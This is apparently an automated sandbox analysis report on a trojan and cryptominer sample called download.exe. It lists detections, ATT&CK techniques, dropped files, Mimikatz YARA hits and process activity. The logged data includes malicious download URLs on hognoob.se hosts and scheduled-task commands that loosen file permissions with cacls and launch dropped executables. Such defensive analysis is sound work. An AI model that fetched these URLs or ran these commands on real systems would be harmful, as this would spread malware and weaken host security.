Date post: | 19-Mar-2023 |
Category: |
Documents |
Upload: | khangminh22 |
View: | 0 times |
Download: | 0 times |
ID: 132586Sample Name: download.exeCookbook: default.jbsTime: 17:14:26Date: 16/05/2019Version: 26.0.0 Aquamarine
2555566778888999999
101010101011111111
1112121212121314141414141414151616161718181818192029292929323232
Table of Contents
Table of ContentsAnalysis Report download.exe
OverviewGeneral InformationDetectionConfidenceClassificationAnalysis AdviceMitre Att&ck MatrixSignature Overview
AV Detection:Exploits:Privilege Escalation:Bitcoin Miner:Spreading:Networking:Key, Mouse, Clipboard, Microphone and Screen Capturing:Spam, unwanted Advertisements and Ransom Demands:System Summary:Data Obfuscation:Persistence and Installation Behavior:Boot Survival:Hooking and other Techniques for Hiding and Protection:Malware Analysis System Evasion:Anti Debugging:HIPS / PFW / Operating System Protection Evasion:Language, Device and Operating System Detection:Lowering of HIPS / PFW / Operating System Security Settings:
Behavior GraphSimulations
Behavior and APIsAntivirus and Machine Learning Detection
Initial SampleDropped FilesUnpacked PE FilesDomainsURLs
Yara OverviewInitial SamplePCAP (Network Traffic)Dropped FilesMemory DumpsUnpacked PEs
Joe Sandbox View / ContextIPsDomainsASNJA3 FingerprintsDropped Files
ScreenshotsThumbnails
StartupCreated / dropped FilesDomains and IPs
Contacted DomainsContacted URLsURLs from Memory and BinariesContacted IPsPublicPrivate
Copyright Joe Security LLC 2019 Page 2 of 69
34343434343536363737
37373739414346464949495050505050515151
525253535353
535454
545454
54545555555555
565656
565657
5757
5757
575758
58585858
5959
606060
Static File InfoGeneralFile IconStatic PE Info
GeneralEntrypoint PreviewRich HeadersData DirectoriesSectionsImports
Network BehaviorNetwork Port DistributionTCP PacketsUDP PacketsDNS QueriesDNS AnswersHTTP Request Dependency GraphHTTP Packets
Code ManipulationsStatistics
BehaviorSystem Behavior
Analysis Process: download.exe PID: 3076 Parent PID: 3220GeneralFile Activities
File CreatedFile DeletedFile MovedFile Written
Analysis Process: qwr4rt.exe PID: 3308 Parent PID: 3076GeneralFile Activities
File CreatedFile MovedFile Written
Registry ActivitiesKey Value CreatedKey Value Modified
Analysis Process: ycemck.exe PID: 3268 Parent PID: 564GeneralFile Activities
Analysis Process: sqlisrv.exe PID: 4748 Parent PID: 3076GeneralFile Activities
File CreatedFile DeletedFile MovedFile Written
Analysis Process: cmd.exe PID: 1896 Parent PID: 4748GeneralFile Activities
Analysis Process: cmd.exe PID: 4080 Parent PID: 3076GeneralFile Activities
Analysis Process: conhost.exe PID: 2560 Parent PID: 1896General
Analysis Process: conhost.exe PID: 4960 Parent PID: 4080General
Analysis Process: PING.EXE PID: 2864 Parent PID: 1896GeneralFile Activities
Analysis Process: certutil.exe PID: 3304 Parent PID: 4080GeneralFile Activities
File Written
Analysis Process: b158ac7.exe PID: 5060 Parent PID: 1896General
Analysis Process: b158ac7.exe PID: 3356 Parent PID: 564GeneralFile Activities
Copyright Joe Security LLC 2019 Page 3 of 69
606061
616161
6161
626262
62626262
63636363
63
6363
63636464
64
6464
6464
6465
6565
6565
6565
6666
6666
6666
6767
6767
6767
6768
6868
6868
6869
6969
6969
6969
File CreatedFile WrittenFile Read
Analysis Process: cmd.exe PID: 3968 Parent PID: 3356GeneralFile Activities
Analysis Process: conhost.exe PID: 3384 Parent PID: 3968General
Analysis Process: cmd.exe PID: 1576 Parent PID: 3968GeneralFile Activities
Analysis Process: cacls.exe PID: 4728 Parent PID: 3968GeneralFile Activities
File Written
Analysis Process: netsh.exe PID: 4864 Parent PID: 3356GeneralFile Activities
File Written
Registry Activities
Analysis Process: conhost.exe PID: 3340 Parent PID: 4864General
Analysis Process: netsh.exe PID: 1784 Parent PID: 3356GeneralFile Activities
File Written
Registry Activities
Analysis Process: conhost.exe PID: 752 Parent PID: 1784General
Analysis Process: cmd.exe PID: 2944 Parent PID: 3968General
Analysis Process: cacls.exe PID: 3632 Parent PID: 3968General
Analysis Process: cmd.exe PID: 4316 Parent PID: 3968General
Analysis Process: cacls.exe PID: 1252 Parent PID: 3968General
Analysis Process: sqlisrv.exe PID: 652 Parent PID: 4080General
Analysis Process: cmd.exe PID: 4068 Parent PID: 3356General
Analysis Process: conhost.exe PID: 2924 Parent PID: 4068General
Analysis Process: GogoleUpadte.exe PID: 284 Parent PID: 4068General
Analysis Process: cmd.exe PID: 1252 Parent PID: 3356General
Analysis Process: cmd.exe PID: 1524 Parent PID: 3356General
Analysis Process: conhost.exe PID: 3968 Parent PID: 1252General
Analysis Process: conhost.exe PID: 1068 Parent PID: 1524General
Analysis Process: vfshost.exe PID: 4240 Parent PID: 1252General
Analysis Process: ouousbpro.exe PID: 2940 Parent PID: 1524General
Analysis Process: cmd.exe PID: 1644 Parent PID: 3356General
Analysis Process: cmd.exe PID: 4448 Parent PID: 3356General
Analysis Process: conhost.exe PID: 4244 Parent PID: 1644General
DisassemblyCode Analysis
Copyright Joe Security LLC 2019 Page 4 of 69
Create Interactive TourAnalysis Report download.exe
Overview
General Information
Joe Sandbox Version: 26.0.0 Aquamarine
Analysis ID: 132586
Start date: 16.05.2019
Start time: 17:14:26
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 15m 12s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: download.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed: 41
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: HCA enabledEGA enabledHDC enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.adwa.expl.evad.mine.winEXE@61/39@73/100
EGA Information: Successful, ratio: 85.7%
HDC Information: Successful, ratio: 12.7% (good quality ratio 11.9%)Quality average: 69.7%Quality standard deviation: 26.6%
HCA Information: Failed
Cookbook Comments: Adjust boot timeEnable AMSIFound application associated with file extension: .exe
Warnings:
Detection
Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.TCP Packets have been reduced to 100Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, CompatTelRunner.exeExecution Graph export aborted for target b158ac7.exe, PID 3356 because it is emptyReport creation exceeded maximum time and may have missing disassembly code information.Report size exceeded maximum capacity and may have missing behavior information.Report size getting too big, too many NtAllocateVirtualMemory calls found.Report size getting too big, too many NtDeviceIoControlFile calls found.Report size getting too big, too many NtOpenKeyEx calls found.Report size getting too big, too many NtProtectVirtualMemory calls found.Report size getting too big, too many NtQueryValueKey calls found.Report size getting too big, too many NtReadVirtualMemory calls found.
Show All
Copyright Joe Security LLC 2019 Page 5 of 69
Strategy Score Range Reporting Whitelisted Detection
Threshold 100 0 - 100 false
Confidence
Strategy Score Range Further Analysis Required? Confidence
Threshold 5 0 - 5 false
Classification
Copyright Joe Security LLC 2019 Page 6 of 69
Analysis Advice
Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additionalcharacters like: "-", "/", "--")
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior
Mitre Att&ck Matrix
Initial Access Execution PersistencePrivilegeEscalation Defense Evasion
CredentialAccess Discovery
LateralMovement Collection Exfiltration
Commandand Control
Valid Accounts Executionthrough API 1
File SystemPermissionsWeakness 1
File SystemPermissionsWeakness 1
Disabling SecurityTools 1
CredentialDumping 1
System TimeDiscovery 2
Remote FileCopy 1 2
InputCapture 1
DataEncrypted 1
UncommonlyUsed Port 2
ReplicationThroughRemovableMedia
ServiceExecution 2
Hooking 1 Hooking 1 SoftwarePacking 1 2 1
Hooking 1 Security SoftwareDiscovery 1 3 1
RemoteServices
Data fromRemovableMedia
ExfiltrationOver OtherNetworkMedium
CommonlyUsed Port 1
Ransomware
Spreading
Phishing
Banker
Trojan / Bot
Adware
Spyware
Exploiter
Evader
Miner
clean
clean
clean
clean
clean
clean
clean
suspicious
suspicious
suspicious
suspicious
suspicious
suspicious
suspicious
malicious
malicious
malicious
malicious
malicious
malicious
malicious
Copyright Joe Security LLC 2019 Page 7 of 69
Drive-byCompromise
WindowsManagementInstrumentation
Modify ExistingService 3 1
ProcessInjection 1 1
Deobfuscate/DecodeFiles orInformation 1
InputCapture 1
File and DirectoryDiscovery 2
WindowsRemoteManagement
Data fromNetworkShared Drive
AutomatedExfiltration
Remote FileCopy 1 2
Exploit Public-FacingApplication
Scheduled Task NewService 2 3
NewService 2 3
File Deletion 1 Credentials inFiles
SystemInformationDiscovery 1 3
Logon Scripts Input Capture DataEncrypted
StandardCryptographicProtocol 1
SpearphishingLink
Command-LineInterface
ShortcutModification
File SystemPermissionsWeakness
Obfuscated Files orInformation 2 1
AccountManipulation
Query Registry 1 SharedWebroot
Data Staged ScheduledTransfer
StandardNon-ApplicationLayerProtocol 2
SpearphishingAttachment
Graphical UserInterface
Modify ExistingService
New Service Masquerading 1 3 Brute Force ProcessDiscovery 1
Third-partySoftware
ScreenCapture
Data TransferSize Limits
StandardApplicationLayerProtocol 2 2
Spearphishingvia Service
Scripting PathInterception
Scheduled Task ProcessInjection 1 1
Two-FactorAuthenticationInterception
ApplicationWindowDiscovery 1
Pass theHash
EmailCollection
ExfiltrationOverCommandand ControlChannel
UncommonlyUsed Port
Supply ChainCompromise
Third-partySoftware
Logon Scripts ProcessInjection
DLL Side-Loading 1
Bash History Remote SystemDiscovery 1 1
RemoteDesktopProtocol
ClipboardData
ExfiltrationOverAlternativeProtocol
StandardApplicationLayer Protocol
TrustedRelationship
Rundll32 DLL SearchOrder Hijacking
ServiceRegistryPermissionsWeakness
Indicator Removalon Host 1
Input Prompt System NetworkConfigurationDiscovery 2
WindowsAdmin Shares
AutomatedCollection
ExfiltrationOver PhysicalMedium
MultilayerEncryption
Initial Access Execution PersistencePrivilegeEscalation Defense Evasion
CredentialAccess Discovery
LateralMovement Collection Exfiltration
Commandand Control
Signature Overview
• AV Detection
• Exploits
• Privilege Escalation
• Bitcoin Miner
• Spreading
• Networking
• Key, Mouse, Clipboard, Microphone and Screen Capturing
• Spam, unwanted Advertisements and Ransom Demands
• System Summary
• Data Obfuscation
• Persistence and Installation Behavior
• Boot Survival
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Anti Debugging
• HIPS / PFW / Operating System Protection Evasion
• Language, Device and Operating System Detection
• Lowering of HIPS / PFW / Operating System Security Settings
Click to jump to signature section
AV Detection:
Antivirus or Machine Learning detection for dropped file
Antivirus or Machine Learning detection for sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Antivirus or Machine Learning detection for unpacked file
Exploits:
Connects to many different private IPs (likely to spread or exploit)
Privilege Escalation:
Copyright Joe Security LLC 2019 Page 8 of 69
Detected Hacktool Mimikatz
Bitcoin Miner:
Detected Stratum mining protocol
Found strings related to Crypto-Mining
Spreading:
Contains functionality to enumerate / list files inside a directory
Networking:
Connects to many ports of the same IP (likely port scanning)
Detected TCP or UDP traffic on non-standard ports
May check the online IP address of the machine
Uses known network protocols on non-standard ports
Uses ping.exe to check the status of other devices and networks
Connects to country known for bullet proof hosters
Downloads executable code via HTTP
IP address seen in connection with other malware
Uses a known web browser user agent for HTTP communication
Contains functionality to download additional files from the internet
Downloads files from webservers via HTTP
Performs DNS lookups
Urls found in memory or binary data
Key, Mouse, Clipboard, Microphone and Screen Capturing:
Creates a DirectInput object (often for capturing keystrokes)
Spam, unwanted Advertisements and Ransom Demands:
Modifies the hosts file
System Summary:
Uses a Windows Living Off The Land Binaries (LOL bins)
Contains functionality to call native functions
Contains functionality to delete services
Contains functionality to shutdown / reboot the system
Creates files inside the system directory
Creates mutexes
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Found potential string decryption / allocating functions
Reads the hosts file
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Yara signature match
PE file has section (not .text) which is very likely to contain packed code (zlib compression ratio < 0.011)
Classification label
Contains functionality to create services
Contains functionality to load and extract PE file embedded resources
Copyright Joe Security LLC 2019 Page 9 of 69
Contains functionality to modify services (start/stop/modify)
Contains functionality to register a service control handler (likely the sample is a service DLL)
Creates files inside the user directory
Creates temporary files
Reads ini files
Reads software policies
Sample is known by Antivirus
Sample might require command line arguments (.Net)
Spawns processes
Uses an in-process (OLE) Automation server
Found graphical window changes (likely an installer)
Binary contains paths to debug symbols
Data Obfuscation:
Contains functionality to dynamically determine API calls
File is packed with WinRar
PE file contains sections with non-standard names
Uses code obfuscation techniques (call, push, ret)
Sample is packed with UPX
Persistence and Installation Behavior:
Drops executables to the windows directory (C:\Windows) and starts them
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Boot Survival:
Creates or modifies windows services
Modifies existing windows services
Contains functionality to start windows services
Hooking and other Techniques for Hiding and Protection:
May modify the system service descriptor table (often done to hook functions)
Moves itself to temp directory
Uses known network protocols on non-standard ports
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to clear windows event logs (to hide its activities)
Uses cacls to modify the permissions of files
Disables application error messsages (SetErrorMode)
Malware Analysis System Evasion:
Contains functionality to detect sleep reduction / modifications
Uses ping.exe to sleep
Contains functionality for execution timing, often used to detect debuggers
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to enumerate / list files inside a directory
Contains functionality to query system information
Copyright Joe Security LLC 2019 Page 10 of 69
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Program exit points
Queries a list of all running processes
Anti Debugging:
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
Contains functionality to register its own exception handler
HIPS / PFW / Operating System Protection Evasion:
System process connects to network (likely due to code injection or exploit)
Modifies the hosts file
Creates a process in suspended mode (likely to inject code)
Language, Device and Operating System Detection:
Queries the volume information (name, serial number etc) of a device
Contains functionality to query local / system time
Contains functionality to query time zone information
Contains functionality to query windows version
Queries the cryptographic machine GUID
Lowering of HIPS / PFW / Operating System Security Settings:
Modifies the hosts file
Uses netsh to modify the Windows network and firewall settings
Behavior Graph
Copyright Joe Security LLC 2019 Page 11 of 69
Behavior Graph
ID: 132586
Sample: download.exe
Startdate: 16/05/2019
Architecture: WINDOWS
Score: 100
pxx.hognoob.se q1a.hognoob.se 2 other IPs or domains
Multi AV Scanner detectionfor domain / URL
Antivirus or MachineLearning detection for
dropped file
Antivirus or MachineLearning detection for
sample16 other signatures
download.exe
14
started
b158ac7.exe
2
started
ycemck.exe
started
fid.hognoob.se
C:\WebKitSdk\2.25.14\sqlisrv.exe, PE32
dropped
C:\WebKitSdk\2.25.14\qwr4rt.exe, PE32
dropped
Moves itself to tempdirectory
Contains functionalityto detect sleep reduction
/ modifications
sqlisrv.exe
4
started
cmd.exe
1
started
qwr4rt.exe
3 1
started
upa1.hognoob.se
172.104.161.101, 49809, 80
unknown
United States
upa2.hognoob.se
172.105.237.113, 49810, 80
unknown
United States
uio.hognoob.se
195.128.126.120, 49808, 63145
unknown
Russian Federation
C:\Windows\System32\drivers\etc\hosts, ASCII
dropped
Modifies the hosts file
cmd.exe
started
cmd.exe
1
started
cmd.exe
started
5 other processes
q1a.hognoob.se
Antivirus or MachineLearning detection for
dropped file
Multi AV Scanner detectionfor dropped file
C:\Windows\cc3d3243\b158ac7.exe, PE32
dropped
Antivirus or MachineLearning detection for
dropped file
Multi AV Scanner detectionfor dropped file
cmd.exe
1
started
Drops executables tothe windows directory
(C:\Windows) andstarts them
Uses a Windows LivingOff The Land Binaries
(LOL bins)
certutil.exe
17
started
sqlisrv.exe
started
conhost.exe
started C:\Windows\SysWOW64\ycemck.exe, PE32
dropped
192.168.0.1, 6666
unknown
unknown
192.168.0.25, 6666
unknown
unknown
GogoleUpadte.exe
started
conhost.exe
started
7 other processes 2 other processes 3 other processes
127.0.0.1
unknown
unknown
Uses ping.exe to sleep
Drops executables tothe windows directory
(C:\Windows) andstarts them
b158ac7.exe
started
conhost.exe
started
PING.EXE
1
started
fid.hognoob.se
C:\Windows\Temp\sqlisrv.exe, PE32
dropped
C:\Users\user\AppData\...\sqlisrv[1].exe, PE32
dropped
C:\Users\...\C4E91F59715AA0FB54843EB617B4C0B5, PE32
dropped
System process connectsto network (likely due
to code injection orexploit)
Antivirus or MachineLearning detection for
dropped file
Multi AV Scanner detectionfor dropped file
192.168.0.10, 6666
unknown
unknown
192.168.0.11, 6666
unknown
unknown
93 other IPs or domains
Connects to many differentprivate IPs (likely
to spread or exploit)
conhost.exe
started
vfshost.exe
started
Antivirus or MachineLearning detection for
dropped file
Multi AV Scanner detectionfor dropped file
Legend:
Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet
Hide Legend
Time Type Description
17:15:36 API Interceptor 3x Sleep call for process: download.exe modified
17:15:41 API Interceptor 49x Sleep call for process: ycemck.exe modified
17:15:45 API Interceptor 1x Sleep call for process: certutil.exe modified
17:17:36 API Interceptor 47x Sleep call for process: b158ac7.exe modified
17:17:39 Task Scheduler Run new task: 355252544 path: cmd s>/c echo Y|cacls C:\Windows\TEMP\80244f85e\c54183.exe /p everyone:F
17:18:00 Task Scheduler Run new task: 93293e638 path: cmd s>/c C:\Windows\ime\b158ac7.exe
17:19:00 Task Scheduler Run new task: d95544aa8 path: cmd s>/c echo Y|cacls C:\Windows\cc3d3243\b158ac7.exe /p everyone:F
Source Detection Scanner Label Link
download.exe 68% virustotal Browse
download.exe 100% Avira HEUR/AGEN.1011827
download.exe 100% Joe Sandbox ML
Source Detection Scanner Label Link
C:\Windows\Temp\sqlisrv.exe 100% Avira HEUR/AGEN.1014767
Simulations
Behavior and APIs
Antivirus and Machine Learning Detection
Initial Sample
Dropped Files
Copyright Joe Security LLC 2019 Page 12 of 69
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\sqlisrv[1].exe 100% Avira HEUR/AGEN.1014767
C:\WebKitSdk\2.25.14\sqlisrv.exe 100% Avira HEUR/AGEN.1014767
C:\Windows\SysWOW64\ycemck.exe 100% Avira TR/BAS.ServStart.xxjtz
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C4E91F59715AA0FB54843EB617B4C0B5
100% Avira HEUR/AGEN.1014767
C:\Windows\cc3d3243\b158ac7.exe 100% Avira HEUR/AGEN.1014767
C:\WebKitSdk\2.25.14\qwr4rt.exe 100% Avira TR/BAS.ServStart.xxjtz
C:\Windows\Temp\sqlisrv.exe 100% Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\sqlisrv[1].exe 100% Joe Sandbox ML
C:\WebKitSdk\2.25.14\sqlisrv.exe 100% Joe Sandbox ML
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C4E91F59715AA0FB54843EB617B4C0B5
100% Joe Sandbox ML
C:\Windows\cc3d3243\b158ac7.exe 100% Joe Sandbox ML
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C4E91F59715AA0FB54843EB617B4C0B5
74% virustotal Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\sqlisrv[1].exe 74% virustotal Browse
C:\WebKitSdk\2.25.14\qwr4rt.exe 79% virustotal Browse
C:\WebKitSdk\2.25.14\sqlisrv.exe 74% virustotal Browse
C:\Windows\SysWOW64\ycemck.exe 79% virustotal Browse
C:\Windows\Temp\sqlisrv.exe 74% virustotal Browse
C:\Windows\cc3d3243\b158ac7.exe 74% virustotal Browse
Source Detection Scanner Label Link
Source Detection Scanner Label Link Download
11.0.b158ac7.exe.400000.0.unpack 100% Avira TR/Crypt.XPACK.Gen Download File
36.0.vfshost.exe.7ff607270000.0.unpack 100% Avira HEUR/AGEN.1013725 Download File
4.2.sqlisrv.exe.400000.0.unpack 100% Avira TR/Crypt.XPACK.Gen Download File
2.2.qwr4rt.exe.400000.0.unpack 100% Avira HEUR/AGEN.1007501 Download File
2.0.qwr4rt.exe.400000.0.unpack 100% Avira TR/BAS.ServStart.xxjtz Download File
11.2.b158ac7.exe.400000.0.unpack 100% Avira TR/Crypt.XPACK.Gen Download File
0.0.download.exe.400000.0.unpack 100% Avira TR/Crypt.XPACK.Gen Download File
4.0.sqlisrv.exe.400000.0.unpack 100% Avira TR/Crypt.XPACK.Gen Download File
3.2.ycemck.exe.400000.0.unpack 100% Avira HEUR/AGEN.1007501 Download File
27.0.sqlisrv.exe.400000.0.unpack 100% Avira TR/Crypt.XPACK.Gen Download File
4.1.sqlisrv.exe.400000.0.unpack 100% Avira TR/Crypt.XPACK.Gen Download File
12.1.b158ac7.exe.400000.0.unpack 100% Avira TR/Crypt.XPACK.Gen Download File
0.2.download.exe.400000.0.unpack 100% Avira TR/Crypt.XPACK.Gen Download File
3.1.ycemck.exe.400000.0.unpack 100% Avira HEUR/AGEN.1007501 Download File
3.0.ycemck.exe.400000.0.unpack 100% Avira TR/BAS.ServStart.xxjtz Download File
27.2.sqlisrv.exe.400000.0.unpack 100% Avira TR/Crypt.XPACK.Gen Download File
12.0.b158ac7.exe.400000.0.unpack 100% Avira TR/Crypt.XPACK.Gen Download File
27.1.sqlisrv.exe.400000.0.unpack 100% Avira TR/Crypt.XPACK.Gen Download File
2.1.qwr4rt.exe.400000.0.unpack 100% Avira HEUR/AGEN.1007501 Download File
0.1.download.exe.400000.0.unpack 100% Avira TR/Crypt.XPACK.Gen Download File
11.1.b158ac7.exe.400000.0.unpack 100% Avira TR/Crypt.XPACK.Gen Download File
11.0.b158ac7.exe.400000.0.unpack 100% Joe Sandbox ML Download File
4.2.sqlisrv.exe.400000.0.unpack 100% Joe Sandbox ML Download File
2.2.qwr4rt.exe.400000.0.unpack 100% Joe Sandbox ML Download File
11.2.b158ac7.exe.400000.0.unpack 100% Joe Sandbox ML Download File
0.0.download.exe.400000.0.unpack 100% Joe Sandbox ML Download File
4.0.sqlisrv.exe.400000.0.unpack 100% Joe Sandbox ML Download File
12.2.b158ac7.exe.400000.0.unpack 100% Joe Sandbox ML Download File
3.2.ycemck.exe.400000.0.unpack 100% Joe Sandbox ML Download File
27.0.sqlisrv.exe.400000.0.unpack 100% Joe Sandbox ML Download File
4.1.sqlisrv.exe.400000.0.unpack 100% Joe Sandbox ML Download File
12.1.b158ac7.exe.400000.0.unpack 100% Joe Sandbox ML Download File
0.2.download.exe.400000.0.unpack 100% Joe Sandbox ML Download File
3.1.ycemck.exe.400000.0.unpack 100% Joe Sandbox ML Download File
27.2.sqlisrv.exe.400000.0.unpack 100% Joe Sandbox ML Download File
12.0.b158ac7.exe.400000.0.unpack 100% Joe Sandbox ML Download File
27.1.sqlisrv.exe.400000.0.unpack 100% Joe Sandbox ML Download File
2.1.qwr4rt.exe.400000.0.unpack 100% Joe Sandbox ML Download File
0.1.download.exe.400000.0.unpack 100% Joe Sandbox ML Download File
11.1.b158ac7.exe.400000.0.unpack 100% Joe Sandbox ML Download File
Unpacked PE Files
Copyright Joe Security LLC 2019 Page 13 of 69
Source Detection Scanner Label Link
haq.hognoob.se 6% virustotal Browse
Source Detection Scanner Label Link
fid.hognoob.se/sqlisrv.exeC: 0% Avira URL Cloud safe
uio.hognoob.se:63145/cfg.inihttp://uio.heroherohero.info:63145/cfg.inihognoob 0% Avira URL Cloud safe
fid.hognoob.se/sqlisrv.exe 19% virustotal Browse
fid.hognoob.se/sqlisrv.exe 0% Avira URL Cloud safe
truehttp://fid.hognoob.se/download.exeoffpxi.hognoob.se:35791pxx.hognoob.se:357891.updateIME 0% Avira URL Cloud safe
u2. 0% Avira URL Cloud safe
fid.hognoob.se/download.exeC: 0% Avira URL Cloud safe
fid.hognoob.se/download.execmd.exe 0% Avira URL Cloud safe
No yara matches
No yara matches
Source Rule Description Author
C:\Windows\5c2a55da8\Corporate\log.txt Mimikatz_Logfile Detects a log file generated by malicious hack tool mimikatz
Florian Roth
Source Rule Description Author
00000024.00000002.6192286869.00007FF607342000.00000040.sdmp mimikatz mimikatz Benjamin DELPY (gentilkiwi)
00000024.00000002.6190697970.00007FF607271000.00000040.sdmp Powerkatz_DLL_Generic Detects Powerkatz - a Mimikatz version prepared to run in memory via Powershell (overlap with other Mimikatz versions is possible)
Florian Roth
00000000.00000002.5123455439.0000000000767000.00000004.sdmp Certutil_Decode_OR_Download
Certutil Decode Florian Roth
00000000.00000002.5112633665.0000000000540000.00000004.sdmp Certutil_Decode_OR_Download
Certutil Decode Florian Roth
00000004.00000001.5091079042.000000000058C000.00000080.sdmp mimikatz mimikatz Benjamin DELPY (gentilkiwi)
00000004.00000001.5091079042.000000000058C000.00000080.sdmp hacktool_windows_mimikatz_errors
Mimikatz credential dump tool: Error messages
@fusionrace
00000004.00000001.5091079042.000000000058C000.00000080.sdmp hacktool_windows_mimikatz_sekurlsa
Mimikatz credential dump tool @fusionrace
00000024.00000001.6149235365.00007FF607342000.00000080.sdmp mimikatz mimikatz Benjamin DELPY (gentilkiwi)
00000000.00000002.5104166883.0000000000401000.00000040.sdmp Certutil_Decode_OR_Download
Certutil Decode Florian Roth
0000000B.00000001.5183737893.000000000058C000.00000080.sdmp mimikatz mimikatz Benjamin DELPY (gentilkiwi)
0000000B.00000001.5183737893.000000000058C000.00000080.sdmp hacktool_windows_mimikatz_errors
Mimikatz credential dump tool: Error messages
@fusionrace
0000000B.00000001.5183737893.000000000058C000.00000080.sdmp hacktool_windows_mimikatz_sekurlsa
Mimikatz credential dump tool @fusionrace
00000024.00000001.6146216390.00007FF607301000.00000080.sdmp Powerkatz_DLL_Generic Detects Powerkatz - a Mimikatz version prepared to run in memory via Powershell (overlap with other Mimikatz versions is possible)
Florian Roth
0000001B.00000001.5573571405.000000000058C000.00000080.sdmp mimikatz mimikatz Benjamin DELPY (gentilkiwi)
Domains
URLs
Yara Overview
Initial Sample
PCAP (Network Traffic)
Dropped Files
Memory Dumps
Copyright Joe Security LLC 2019 Page 14 of 69
0000001B.00000001.5573571405.000000000058C000.00000080.sdmp hacktool_windows_mimikatz_errors
Mimikatz credential dump tool: Error messages
@fusionrace
0000001B.00000001.5573571405.000000000058C000.00000080.sdmp hacktool_windows_mimikatz_sekurlsa
Mimikatz credential dump tool @fusionrace
0000000B.00000002.5202663261.0000000000401000.00000040.sdmp mimikatz mimikatz Benjamin DELPY (gentilkiwi)
0000000B.00000002.5202663261.0000000000401000.00000040.sdmp hacktool_windows_mimikatz_errors
Mimikatz credential dump tool: Error messages
@fusionrace
0000000B.00000002.5202663261.0000000000401000.00000040.sdmp hacktool_windows_mimikatz_sekurlsa
Mimikatz credential dump tool @fusionrace
00000004.00000002.5101425693.0000000000401000.00000040.sdmp mimikatz mimikatz Benjamin DELPY (gentilkiwi)
00000004.00000002.5101425693.0000000000401000.00000040.sdmp hacktool_windows_mimikatz_errors
Mimikatz credential dump tool: Error messages
@fusionrace
00000004.00000002.5101425693.0000000000401000.00000040.sdmp hacktool_windows_mimikatz_sekurlsa
Mimikatz credential dump tool @fusionrace
0000000C.00000001.5206506082.0000000000401000.00000040.sdmp mimikatz mimikatz Benjamin DELPY (gentilkiwi)
0000000C.00000001.5206506082.0000000000401000.00000040.sdmp hacktool_windows_mimikatz_errors
Mimikatz credential dump tool: Error messages
@fusionrace
0000000C.00000001.5206506082.0000000000401000.00000040.sdmp hacktool_windows_mimikatz_sekurlsa
Mimikatz credential dump tool @fusionrace
0000001B.00000002.5578674251.0000000000401000.00000040.sdmp mimikatz mimikatz Benjamin DELPY (gentilkiwi)
0000001B.00000002.5578674251.0000000000401000.00000040.sdmp hacktool_windows_mimikatz_errors
Mimikatz credential dump tool: Error messages
@fusionrace
0000001B.00000002.5578674251.0000000000401000.00000040.sdmp hacktool_windows_mimikatz_sekurlsa
Mimikatz credential dump tool @fusionrace
Source Rule Description Author
Source Rule Description Author
36.1.vfshost.exe.7ff607270000.0.unpack Powerkatz_DLL_Generic Detects Powerkatz - a Mimikatz version prepared to run in memory via Powershell (overlap with other Mimikatz versions is possible)
Florian Roth
36.1.vfshost.exe.7ff607270000.0.unpack mimikatz mimikatz Benjamin DELPY (gentilkiwi)
36.1.vfshost.exe.7ff607270000.0.unpack Mimikatz_Strings Detects Mimikatz strings Florian Roth
36.1.vfshost.exe.7ff607270000.0.unpack Mimikatz_Gen_Strings Detects Mimikatz by using some special strings
Florian Roth
36.2.vfshost.exe.7ff607270000.0.unpack Powerkatz_DLL_Generic Detects Powerkatz - a Mimikatz version prepared to run in memory via Powershell (overlap with other Mimikatz versions is possible)
Florian Roth
36.2.vfshost.exe.7ff607270000.0.unpack mimikatz mimikatz Benjamin DELPY (gentilkiwi)
36.2.vfshost.exe.7ff607270000.0.unpack Mimikatz_Strings Detects Mimikatz strings Florian Roth
36.2.vfshost.exe.7ff607270000.0.unpack Mimikatz_Gen_Strings Detects Mimikatz by using some special strings
Florian Roth
12.2.b158ac7.exe.400000.0.unpack Ping_Command_in_EXE Detects an suspicious ping command execution in an executable
Florian Roth
27.1.sqlisrv.exe.400000.0.unpack mimikatz mimikatz Benjamin DELPY (gentilkiwi)
27.1.sqlisrv.exe.400000.0.unpack Mimikatz_Strings Detects Mimikatz strings Florian Roth
27.1.sqlisrv.exe.400000.0.unpack hacktool_windows_mimikatz_errors
Mimikatz credential dump tool: Error messages
@fusionrace
